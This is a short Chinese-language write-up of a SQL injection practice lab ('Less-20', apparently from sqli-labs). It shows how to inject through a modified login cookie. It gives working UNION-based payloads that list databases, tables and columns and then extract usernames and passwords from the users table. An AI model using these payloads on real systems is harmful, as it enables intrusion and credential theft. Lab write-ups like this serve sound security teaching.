Less-20 cookie头注入
**Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。
先正常登陆:
返回了输入的name和password,并提示使用cookie注入
判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入就可以获取信息。
正常登陆:
修改cookie的值为admin’,出现报错,
更改为admin‘#,返回正常,说明cookie闭合方式为’’,
接下来判断回显字段:
我们在3位置处构造sql语句,进行注入:
查询当前数据库:
查询所有数据库:
’ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)#
查询security库中的所有表:
’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)#
查询users表中的字段:
’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)#
将username和password联合查出:
’ union select 1,2,(select concat_ws(username,’/-’,password) from security.users limit 0,1)#
未完待续。。。。。